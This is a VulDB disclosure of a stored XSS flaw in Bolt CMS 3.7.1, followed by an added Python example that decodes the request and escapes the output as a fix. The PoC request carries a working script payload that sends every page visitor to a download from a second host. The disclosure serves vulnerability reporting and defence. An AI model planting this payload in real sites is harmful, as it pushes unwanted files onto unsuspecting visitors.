| Field | Value |
|---|---|
| Title | Bolt CMS 3.7.1 XSS + drive-by download |
| Description | In Bolt CMS 3.7.1, an authenticated user can insert a malicious script into the `<textarea>` field when creating a showcase. This script can facilitate the download of malicious files without the consent of users who access the page. |

## PoC

--- Request ---

```http
POST /bolt/editcontent/showcases HTTP/1.1
Host: 10.10.22.5:8000

content_edit%5B_token%5D=6c77j8NxXJ5Q8bQsFkUnb801F2M_UbzMn3rKtPqeOBI&editreferrer=&contenttype=showcases&title=Test+Page+1&slug=test-page-1&html=%3Cp%3ETest+page%2C+malicios%3C%2Fp%3E%0D%0A&textarea=%3Cscript%3E%0D%0Awindow.location+%3D+%27http%3A%2F%2F10.8.140.71%3A%2Fteste-example.txt%27%3B%0D%0A%3C%2Fscript%3E%0D%0A&markdown=&geolocation%5Baddress%5D=&geolocation%5Blatitude%5D=&geolocation%5Blongitude%5D=&geolocation%5Bformatted_address%5D=&embed%5Burl%5D=&embed%5Bwidth%5D=&embed%5Bheight%5D=&embed%5Bprovider_name%5D=&embed%5Bauthor_name%5D=&embed%5Bauthor_url%5D=&embed%5Bhtml%5D=&embed%5Bthumbnail%5D=&video%5Burl%5D=&video%5Bwidth%5D=&video%5Bheight%5D=&video%5Btitle%5D=&video%5Bauthorname%5D=&video%5Bratio%5D=&video%5Bauthorurl%5D=&video%5Bhtml%5D=&video%5Bthumbnail%5D=&image%5Bfile%5D=&image%5Btitle%5D=&files%5B%5D=&files%5B%5D=&imagelist=%5B%5D&file=&files%5B%5D=&files%5B%5D=&filelist=%5B%5D&datetime=2000-01-01+00%3A00%3A00&date=2024-06-01&integerfield=0&floatfield=0&selectfield=&selectentry=&repeater%5B%5D=&repeater%5B0%5D%5Brepeattitle%5D=&repeater%5B0%5D%5Brepeatimage%5D%5Bfile%5D=&files%5B%5D=&repeater%5B0%5D%5Brepeatcontent%5D=&relation%5Bentries%5D%5B%5D=&id=&status=published&datepublish=2024-07-26+13%3A48%3A04&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
```

| Field | Value |
|---|---|
| User | xMirandax (UID 72454) |
| Submission | 26/07/2024 16:15 (2 years ago) |
| Moderation | 30/07/2024 17:33 (4 days later) |
| Status | Accepted |
| VulDB Entry | 273168 [Bolt CMS 3.7.1 Showcase Creation showcases title/textarea cross site scripting] |
| Points | 17 |
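The following is an added example, not part of the VulDB submission or of Bolt CMS. It decodes the form body from the PoC request above (unrelated fields dropped), shows which stored field carries an opening `<script>` tag, and renders that field with HTML entity escaping, which is the output-encoding fix that turns the injected payload into inert text. The field names come from the PoC; the `render_textarea` wrapper markup is an assumption for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Form body taken from the PoC request on this page; fields not relevant
# to the finding (token, geolocation, embed, video, ...) are omitted.
POC_BODY = (
    "contenttype=showcases&title=Test+Page+1&slug=test-page-1"
    "&html=%3Cp%3ETest+page%2C+malicios%3C%2Fp%3E%0D%0A"
    "&textarea=%3Cscript%3E%0D%0Awindow.location+%3D+%27http%3A%2F%2F"
    "10.8.140.71%3A%2Fteste-example.txt%27%3B%0D%0A%3C%2Fscript%3E%0D%0A"
    "&markdown=&status=published"
)

# Opening script tag, tolerant of case and whitespace after '<'.
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def decode_form(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_script_fields(fields: dict[str, str]) -> list[str]:
    """Names of fields whose decoded value contains an opening <script> tag."""
    return [name for name, value in fields.items() if SCRIPT_RE.search(value)]


def render_textarea(value: str) -> str:
    """Render a stored field as text: entity-escape it so markup is shown, not executed.

    The surrounding <div> is an assumed wrapper, not Bolt's actual template.
    """
    return f'<div class="showcase-text">{html.escape(value, quote=True)}</div>'


if __name__ == "__main__":
    fields = decode_form(POC_BODY)
    print("fields containing <script>:", flag_script_fields(fields))
    print("decoded textarea:", repr(fields["textarea"]))
    print("escaped rendering:", render_textarea(fields["textarea"]))
```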